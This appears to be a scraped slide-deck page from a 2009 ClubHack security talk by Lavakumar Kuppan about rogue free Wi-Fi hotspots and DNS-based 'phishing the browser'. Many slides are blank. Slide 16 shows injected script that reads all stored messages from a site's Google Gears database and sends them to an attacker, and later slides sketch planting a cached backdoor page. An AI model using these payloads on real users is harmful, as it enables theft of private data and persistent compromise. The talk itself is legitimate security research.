Driving Behavioral Change for Information Management through Data-Driven Gree...
Lavakumar kuppan _lust_2_0 - ClubHack2009
1. Lust 2.0 – Desire for free Wi-Fi and the threat of the Imposter Lavakumar Kuppan Security Researcher, Attack and Defense Labs www.andlabs.org
2.
3.
4.
5.
6. GET / HTTP/1.1 Host: gmail.com HTTP 200 OK EVIL CONTENT Browser Phishing Begins GET / HTTP/1.1 Host: myspace.com
7. Phishing the Browser!! Phishing the User Phishing the Browser User identifies a site by its visual appearance Browser identifies a site by its DNS name Attacker creates a site which looks similar to the site he wants to target Attacker controls the DNS and is able to serve content for the DNS name he wants to target User gives away sensitive data Browser gives away sensitive data Abuse user’s trust on the appearance of the site Abuse browser’s trust on the Domain Name of the site Browser cannot identify the attack User cannot identify the attack
8.
9.
10.
11.
12.
13.
14.
15.
16. GET /steal_db HTTP/1.1 Host: myspace.com HTTP 200 OK <script> var db = google.gears.factory.create('beta.database'); db.open('messaging.myspace.com'); var rs = db.execute('select * from messages'); while (rs.isValidRow()) { send_data_to_attacker(); } </script>
26. GET / HTTP/1.1 Host: example.com HTTP 200 OK <script> Store ‘/common.js’ in the local resource store </script> /common,js is stored in the local servce
27. GET /common.js HTTP/1.1 Host: example.com HTTP 200 OK Common.js content
28.
29.
30.
31.
32.
33. GET / HTTP/1.1 Host: example.com HTTP 200 OK <script> Store /backdoor.html </script> /backdoor.html is stored in the local servce